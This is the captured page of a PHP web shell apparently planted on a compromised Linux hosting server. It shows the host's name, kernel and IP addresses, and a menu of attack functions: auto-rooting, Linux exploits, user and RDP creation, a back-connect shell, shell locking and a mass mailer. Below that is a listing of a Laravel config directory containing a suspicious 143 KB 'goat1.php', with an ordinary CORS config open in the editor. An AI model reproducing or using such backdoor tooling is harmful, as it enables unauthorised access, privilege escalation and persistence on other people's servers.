Linux server1.signalhg.team 4.18.0-553.134.1.el8_10.x86_64 #1 SMP Tue Jun 16 16:05:57 EDT 2026 x86_64
Apache
: 209.74.80.147 | : 216.73.216.169
150 Domain
8.1.34
signgwph
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
signgwph /
signaltechdemo6.com /
config /
[ HOME SHELL ]
Name
Size
Permission
Action
config
[ DIR ]
drwxr-xr-x
.htaccess
127
B
-r--r--r--
app.php
9.66
KB
-rw-r--r--
auth.php
3.82
KB
-rw-r--r--
broadcasting.php
1.62
KB
-rw-r--r--
cache.php
3.13
KB
-rw-r--r--
cartalyst.sentinel.php
7.66
KB
-rw-r--r--
cors.php
857
B
-rw-r--r--
database.php
5.08
KB
-rw-r--r--
datatables.php
3.95
KB
-rw-r--r--
filesystems.php
2.63
KB
-rw-r--r--
goat1.php
143.87
KB
-rw-r--r--
hashing.php
1.58
KB
-rw-r--r--
logging.php
2.93
KB
-rw-r--r--
mail.php
3.4
KB
-rw-r--r--
queue.php
2.78
KB
-rw-r--r--
services.php
1017
B
-rw-r--r--
session.php
7.07
KB
-rw-r--r--
view.php
1.06
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : cors.php
<?php return [ /* |-------------------------------------------------------------------------- | Cross-Origin Resource Sharing (CORS) Configuration |-------------------------------------------------------------------------- | | Here you may configure your settings for cross-origin resource sharing | or "CORS". This determines what cross-origin operations may execute | in web browsers. You are free to adjust these settings as needed. | | To learn more: https://developer.mozilla.org/en-US/docs/Web/HTTP/CORS | */ 'paths' => ['api/*'], 'allowed_methods' => ['*'], 'allowed_origins' => ['*'], 'allowed_origins_patterns' => [], 'allowed_headers' => ['*'], 'exposed_headers' => [], 'max_age' => 0, 'supports_credentials' => false, ];
Close